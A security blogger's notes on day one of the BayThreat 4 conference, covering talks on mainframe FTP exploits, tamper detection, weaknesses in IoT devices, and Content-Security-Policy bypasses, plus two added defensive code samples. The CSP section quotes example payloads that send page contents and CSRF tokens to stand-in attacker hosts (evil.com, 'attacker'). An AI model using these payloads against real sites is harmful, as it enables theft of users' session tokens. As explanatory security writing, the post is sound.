BayThreat 4 - Day One
The year is almost over, but the infosec community in the Bay Area shows no signs of slowing down with the fourth annual BayThreat conference happening this Friday and Saturday. I always loved smaller hacker cons for their much more personable feel and few carefully selected talks that you can see without missing a dozen others. I love BayThreat not only because it is a local event, but also due to the overall quality of the talks and organization being on par with many of the larger cons.
BayThreat 4 marks the return to the Hacker Dojo, albeit at a different location, which in my opinion is even better than the original. Below are a few writeups on the talks from the breaker track that I had a chance to attend.
- Hacking Mainframes Like a Boss
- Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"
- Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts
- So You Want to Build A Burp Plugin?
- Bypassing Content-Security-Policy
Hacking Mainframes Like a Boss
If you ever wanted to "Hack the Gibson" or are just interested in attacking obscure yet highly sensitive targets, this talk was a real treat. George Sarbanes &0xBA115 Polivka and Phillip Soldier of Fortran gave an excellent presentation on z/OS mainframes and several exploits. Apparently z/OS FTP servers can be used to execute arbitrary commands by uploading a JCL file and calling the SITE FILE=JES command. Check out MainTP and ftp_jcl_app.rb to test out the code yourself.
Phillip and George were nice enough to set up an emulated z/OS server for us to play with, but if you want to try out the exploits yourself, install The Hercules z/Architecture Emulator on your personal computer.
The main message of the talk was to encourage security researchers to take a look at mainframe security. Because of their relative obscurity, a lot of vulnerabilities that were discovered and patched in more mainstream systems are waiting to be discovered on these aging giants.
- Soldier of Fortran Blog - a collection of articles, utilities, rexx scripts, exploits, ascii art and sexy mainframe advertising pamphlets.
- Soldier of Fortran Github - source repository for MainTP and other mainframe security tools.
- chief4scot Github - metasploit fork with the new Z/architecture and the
- The Hercules - z/Architecture Emulator
Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"
The presentation by Eric Michaud (Rift Recon) and Ryan Lackey (CryptoSeal, Havenco, MetaColo and a few other ventures) introduced a novel methodology for visual detection of tampering with sensitive equipment such as a company laptop. Their concept works by taking pictures of a laptop fitted with tamper-evident stickers before and after leaving the device unattended, the setting of a classic "Evil Maid" attack. By utilizing computer vision algorithms on your smartphone, they made it possible to cheaply and effectively detect evidence of tampering.
Naturally the approach is not foolproof, but considering just how cheap and effective it is to implement this, I think the final app, called Verifier, should be a pretty effective additional layer of defense.
Other than the main presentation, I liked the fun stories from the trenches, ranging from AirFrance bugging first class seats to using RF emanations to detect unlicensed software copies running in the room.
- Cryptoseal Verifier - Future location of the app once it goes public.
Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts
A fun talk about the lack of security in many Internet enabled and remotely controlled home gadgets all while getting a private tour of Nitesh Dhanjani's apartment =].
The Philips Hue Lighting System generates a username token, used to authenticate to the wireless bridge, by simply MD5-ing the MAC address of the authenticating device (iPhone). Nitesh showed a video of an attack where he enumerated all of the connected devices on the network, obtained their MAC addresses and tried all of them to perform an action on the bridge. Once the attack script found a registered device, it went into a loop issuing the lights off command, causing a continuous blackout.
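Why a token derived from the MAC address gives no protection, as an added example that is not from the talk or from the vendor: a toy in-memory bridge (the Bridge class and the MAC values are constructed for illustration) compares the MD5-of-MAC scheme with a random token. The exact string the app hashes is not given here, so lowercase colon-separated text is assumed.

```python
import hashlib
import hmac
import secrets

def weak_token(mac: str) -> str:
    """Scheme described above: the token is the MD5 of the client's MAC address.
    Assumption: input is the lowercase colon-separated MAC string."""
    return hashlib.md5(mac.lower().encode()).hexdigest()

class Bridge:
    """Toy model of a bridge whitelist (hypothetical, no networking)."""
    def __init__(self):
        self._tokens = set()

    def register_weak(self, mac: str) -> str:
        token = weak_token(mac)
        self._tokens.add(token)
        return token

    def register_random(self) -> str:
        # Hardened: 128 bits from the OS CSPRNG, unrelated to any identifier.
        token = secrets.token_hex(16)
        self._tokens.add(token)
        return token

    def is_authorized(self, token: str) -> bool:
        # Constant-time comparison against each stored token.
        return any(hmac.compare_digest(token, t) for t in self._tokens)

def derivable_from_lan(bridge: Bridge, visible_macs) -> bool:
    """Audit check: can any accepted token be recomputed from MAC addresses
    that every host on the same network segment can already see?"""
    return any(bridge.is_authorized(weak_token(m)) for m in visible_macs)

# Constructed sample values.
VISIBLE_MACS = ["AA:BB:CC:00:11:22", "aa:bb:cc:00:11:33"]
```
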
Belkin WeMo Baby Monitor allowed connection from any smartphone with the WeMo smartphone app on the local network. After the initial connection to the baby monitor, the smartphone app obtained a unique identifier which could be used to listen in to the audio stream on the baby monitor from any point on the internet. Belkin WeMo Switch had the same issue as the baby monitor: connect once, connect from anywhere.
Belkin NetCam used a different infrastructure and required authentication over SSL. However, apparently the NetCam periodically sent login and password to a 3rd party box on the Internet in clear text.
- Nitesh Dhanjani Blog.
- Reconsidering the Perimeter Security - paper covering Belkin device hacks.
- Hacking Lightbulbs: Security Evaluation of the Philips hue Personal Wireless Lighting.
So You Want to Build A Burp Plugin?
An educational talk by Monika Morrow introducing viewers to Burp plugin development in Java. Monika covered a new set of Burp APIs and illustrated several complete plugins to modify traffic and enhance the Burp experience with additional context menus and notifications.
Bypassing Content-Security-Policy
A comprehensive talk by Alex kuza55 Kouzemtchenko on subverting CSP with a sample goal of leaking CSRF tokens embedded in the body of the page. Several classes of bypasses were demonstrated in the presentation:
- Dangling Markup Injection involved the use of the classic img-src, form-action, button, option, font-src * etc. to embed half-completed markup (e.g. <form action='http://evil.com/log.cgi'><textarea>) so that the page in its entirety, including any hidden CSRF token, would be submitted to the attacker's page.
- Abusing CSS3 selectors to sequentially extract CSRF token values. This trick works by using a targeted CSS selector such as input[name=csrf_token][value^=a] and triggering the corresponding request to the attacker's site using background-image: url(http://attacker/log?^a)
- Abusing SVG Files to leak page contents and do a lot more damage.
- Using user installed plugins such as Flash, Adobe Reader, etc. to abuse plugin specific functionality (e.g. ExternalInterface.call).
Next, Alex went into a separate class of application specific attacks using JSONP callbacks, browser specific flaws or just abusing unsafe-evals in sites' scripts.
I found attacks utilizing Content Delivery Networks like Akamai particularly interesting because they expose your site by hosting vulnerable versions of scripts on the same shared domain as you, regardless of the scripts that your site actually uses.
To finish off the presentation, Alex covered some of the browser mitigations to the above attack vectors and how to bypass them once more.
I would highly recommend going over Alex's presentation with a fine-tooth comb as a comprehensive guide on various injection and bypass attack vectors in modern browsers once slides become available.
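A defender-side check for the bypass classes listed above, as an added example that is not taken from Alex's slides: it parses a Content-Security-Policy header value and reports which directives still leave those channels open. The finding labels and the two sample policies are constructed for illustration.

```python
def parse_csp(header):
    """Parse a CSP header value into {directive: [source, ...]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            # A repeated directive is ignored by browsers: the first one wins.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def sources(policy, directive, fallback=True):
    """Effective source list, or None when loads are left unrestricted."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src") if fallback else None

def wide_open(src):
    """True when the directive is absent or allows any host."""
    return src is None or any(s in ("*", "http:", "https:") for s in src)

def audit(header):
    """Return the bypass classes from the notes above that the policy leaves open."""
    p, found = parse_csp(header), []
    # form-action has no default-src fallback, so it must be set explicitly.
    if wide_open(sources(p, "form-action", fallback=False)):
        found.append("form-action")      # dangling <form> can submit the page body
    for d in ("img-src", "font-src"):
        if wide_open(sources(p, d)):
            found.append(d)              # URL loads usable as a leak channel
    style = sources(p, "style-src")
    if wide_open(style) or "'unsafe-inline'" in style:
        found.append("style-src")        # injected attribute selectors leak values
    script = sources(p, "script-src")
    if wide_open(script) or "'unsafe-eval'" in script:
        found.append("script-src")
    if script and any("." in s and "/" not in s.split("//")[-1] for s in script):
        found.append("script-src-host")  # whole shared host allowed (CDN, JSONP)
    if wide_open(sources(p, "object-src")):
        found.append("object-src")       # plugin content (Flash, PDF) can load
    return found

# Constructed sample policies.
WEAK = "default-src 'self'; img-src *; script-src 'self' cdn.example.net 'unsafe-eval'"
TIGHT = ("default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; "
         "font-src 'self'; form-action 'self'; object-src 'none'")
```
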
- W3C Selectors Level 3
- The image that called me - Active Content Injection with SVG Files
- Attacking Rich Internet Applications
- Scriptless Attacks - Stealing the Pie Without Touching the Still
Not bad for the first day, time to get some sleep and get ready for more excellent people and talks tomorrow.
All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.